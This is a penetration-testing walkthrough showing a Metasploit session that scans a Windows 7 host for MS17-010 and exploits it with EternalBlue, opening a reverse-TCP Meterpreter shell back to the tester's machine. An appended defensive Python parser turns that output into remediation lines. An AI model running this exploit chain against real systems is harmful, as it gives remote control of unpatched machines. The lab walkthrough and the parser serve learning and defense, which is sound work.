Windows Network Service Penetration Testing in Practice: Cross-Subnet Attacks (Part 2)

Windows Network Service Penetration Testing in Practice: Cross-Subnet Attacks
 
┌──(kali㉿kali)-[~/Desktop]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:68:f4:d1 brd ff:ff:ff:ff:ff:ff
inet 192.168.43.89/24 brd 192.168.43.255 scope global dynamic noprefixroute eth0
valid_lft 2911sec preferred_lft 2911sec
inet6 240e:468:81:203c:da81:9549:e675:f2e0/64 scope global temporary dynamic
valid_lft 3538sec preferred_lft 3538sec
inet6 240e:468:81:203c:20c:29ff:fe68:f4d1/64 scope global dynamic mngtmpaddr noprefixroute
valid_lft 3538sec preferred_lft 3538sec
inet6 fe80::20c:29ff:fe68:f4d1/64 scope link noprefixroute
valid_lft forever preferred_lft forever
 
┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole
=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Open an interactive Ruby terminal with
irb
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.43.99
rhosts => 192.168.43.99
msf6 auxiliary(scanner/smb/smb_ms17_010) > set threads 512
threads => 512
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.43.99:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.43.99:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.43.99
rhost => 192.168.43.99
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.43.89
lhost => 192.168.43.89
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
 
[*] Started reverse TCP handler on 192.168.43.89:4444
[*] 192.168.43.99:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.43.99:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.43.99:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.43.99:445 - The target is vulnerable.
[*] 192.168.43.99:445 - Connecting to target for exploitation.
[+] 192.168.43.99:445 - Connection established for exploitation.
[+] 192.168.43.99:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.43.99:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.43.99:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.43.99:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.43.99:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.43.99:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.43.99:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.43.99:445 - Sending all but last fragment of exploit packet
[*] 192.168.43.99:445 - Starting non-paged pool grooming
[+] 192.168.43.99:445 - Sending SMBv2 buffers
[+] 192.168.43.99:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.43.99:445 - Sending final SMBv2 buffers.
[*] 192.168.43.99:445 - Sending last fragment of exploit packet!
[*] 192.168.43.99:445 - Receiving response from exploit packet
[+] 192.168.43.99:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.43.99:445 - Sending egg to corrupted connection.
[*] 192.168.43.99:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.43.99
[*] Meterpreter session 1 opened (192.168.43.89:4444 -> 192.168.43.99:50762) at 2022-05-18 22:23:55 -0400
[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
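The console output above is what a blue team usually receives from a pentest as raw text. As an added example (not from the original post or from Metasploit), here is a small defender-side parser that turns that output into a de-duplicated list of hosts flagged for MS17-010 and the sessions that were opened against them, so patching and incident response can be tracked per host. The sample input is constructed from the line formats shown above; the "does NOT appear vulnerable" wording for a clean host is an assumption.

```python
import re
from typing import Dict, List

# Constructed sample in the format of the msfconsole output above. The "does NOT appear
# vulnerable" line is an assumed wording for a clean host, not copied from the page.
SAMPLE_OUTPUT = """\
[+] 192.168.43.99:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.43.99:445 - Scanned 1 of 2 hosts (50% complete)
[*] 192.168.43.120:445 - Host does NOT appear vulnerable.
[*] 192.168.43.120:445 - Scanned 2 of 2 hosts (100% complete)
[+] 192.168.43.99:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] Meterpreter session 1 opened (192.168.43.89:4444 -> 192.168.43.99:50762) at 2022-05-18 22:23:55 -0400
"""

VULN_RE = re.compile(
    r"^\[\+\] (?P<host>[\d.]+):(?P<port>\d+) - Host is likely VULNERABLE to MS17-010! - (?P<os>.+)$"
)
SESSION_RE = re.compile(
    r"^\[\*\] Meterpreter session (?P<sid>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\) at (?P<when>.+)$"
)


def parse_msf_output(text: str) -> Dict[str, List[dict]]:
    """Collect MS17-010 findings and opened sessions. The scanner run and the exploit's
    built-in check both print the vulnerable-host line, so findings are de-duplicated."""
    seen, vulnerable, sessions = set(), [], []
    for line in text.splitlines():
        if m := VULN_RE.match(line.strip()):
            key = (m["host"], int(m["port"]))
            if key not in seen:
                seen.add(key)
                vulnerable.append({"host": m["host"], "port": key[1], "os": m["os"]})
        elif m := SESSION_RE.match(line.strip()):
            sessions.append({"id": int(m["sid"]), "attacker": f"{m['lhost']}:{m['lport']}",
                             "victim": f"{m['rhost']}:{m['rport']}", "opened_at": m["when"]})
    return {"vulnerable": vulnerable, "sessions": sessions}


def remediation_lines(findings: Dict[str, List[dict]]) -> List[str]:
    """One line per flagged host; a host with an observed session is escalated to IR."""
    compromised = {s["victim"].rsplit(":", 1)[0] for s in findings["sessions"]}
    return [f"{v['host']}:{v['port']} {v['os']} -> "
            + ("session observed, treat as compromised" if v["host"] in compromised else "patch pending")
            for v in findings["vulnerable"]]


if __name__ == "__main__":
    for line in remediation_lines(parse_msf_output(SAMPLE_OUTPUT)):
        print(line)
```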

